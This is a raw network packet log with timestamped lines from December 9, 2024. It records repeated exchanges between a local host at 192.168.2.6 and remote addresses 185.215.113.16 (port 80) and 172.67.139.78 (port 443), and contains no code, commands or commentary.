                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.046789885 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.046832085 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.047713041 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.047751904 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.189502001 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.189551115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.189568043 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.189599991 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.190105915 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.190148115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.190300941 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.190422058 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.191203117 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.191246033 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.191613913 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.191653967 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.191950083 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.191993952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.192691088 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.192825079 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.192954063 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.193046093 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.193783998 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.193824053 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.193918943 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.194072008 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.194904089 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.194952011 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.195267916 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.195311069 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.196010113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.196057081 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.205288887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.205348015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.205518007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.205562115 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.205807924 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.205853939 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.206125021 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.206908941 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.206964970 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.207020998 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.207062960 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.208116055 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.208154917 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.208452940 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.208492994 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.209156990 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.209194899 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.209311008 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.209347963 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.210174084 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.210220098 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.210285902 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.210422039 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.211360931 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.211404085 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.211838007 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.211884022 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.212439060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.212481022 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.212609053 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.212718010 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.213546991 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.213598967 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.213706970 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.213787079 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.214689016 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.214761019 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.214792967 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.214826107 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.215779066 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.216001034 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.216042995 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.216908932 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.217160940 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.217192888 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.217231989 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.218105078 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.218152046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.218491077 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.218527079 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.219079018 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.219124079 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.219297886 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.219341993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.220339060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.220386028 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.220824957 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.220868111 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.221295118 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.221338987 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.221453905 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.221575975 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.222417116 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.222464085 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.222553968 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.222687006 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.223694086 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.223745108 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.223846912 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.223893881 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.224653006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.224692106 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.224786997 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.224828005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.225796938 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.225878000 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.225887060 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.225920916 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.226967096 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.227004051 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.227176905 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.227528095 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.228004932 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.228051901 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.228348970 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.228390932 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.229053020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.229098082 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.229123116 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.229157925 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.230201960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.230288029 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.230323076 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.230436087 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.231348038 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.231735945 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.231774092 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.232405901 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.232449055 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.232631922 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.232670069 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.233562946 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.233779907 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.233815908 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.234585047 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.234632015 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.234761953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.234828949 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.235925913 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.235968113 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.236119986 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.236407042 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.236804962 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.236850023 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.237200022 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.237241030 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.238091946 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.238141060 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.238260031 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.238348961 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.239170074 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.239209890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.239294052 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.239329100 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.240147114 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.240190983 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.240463972 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.240505934 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.241410017 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.241451025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.241573095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.241609097 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.242595911 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.242767096 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.242804050 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.243489981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.243530035 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.243660927 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.243695974 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.244643927 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.244687080 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.244870901 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.245699883 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.245739937 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.245796919 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.245835066 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.246829987 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.246871948 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.246905088 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.246938944 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.247862101 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.247901917 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.248130083 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.248166084 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.249058962 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.249094963 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.249608994 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.249644995 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.250065088 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.250103951 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.250190020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.250227928 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.251214981 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.251591921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.251631975 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.252352953 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.252391100 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.252670050 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.252712011 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.253437996 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.253474951 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.253513098 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.253549099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.254592896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.254798889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.254834890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.255592108 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.255630016 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.255697966 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.255798101 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.256923914 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.256963015 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.256975889 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.256987095 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.256990910 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.381791115 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.381850958 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.382102966 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.382114887 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.382162094 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.382240057 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.382287025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.383168936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.383419991 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.383573055 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.383625031 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.384351969 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.384840965 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.384876966 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.384891033 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.385510921 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.385557890 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.386049032 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.386099100 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.386502028 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.386553049 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.387124062 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.387615919 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.387639046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.387664080 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.387684107 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.387723923 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.388679028 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.388794899 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.397492886 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.397541046 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.397787094 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.397847891 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.398081064 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.398093939 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.398139954 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.399137020 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.399178982 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.399270058 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.399341106 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.400227070 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.400283098 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.400402069 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.400511980 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.401340008 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.401514053 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.401567936 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.402498960 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.402544022 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.402705908 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.402894020 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.403547049 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.403593063 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.403659105 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:35.403700113 CET4992380192.168.2.6185.215.113.16
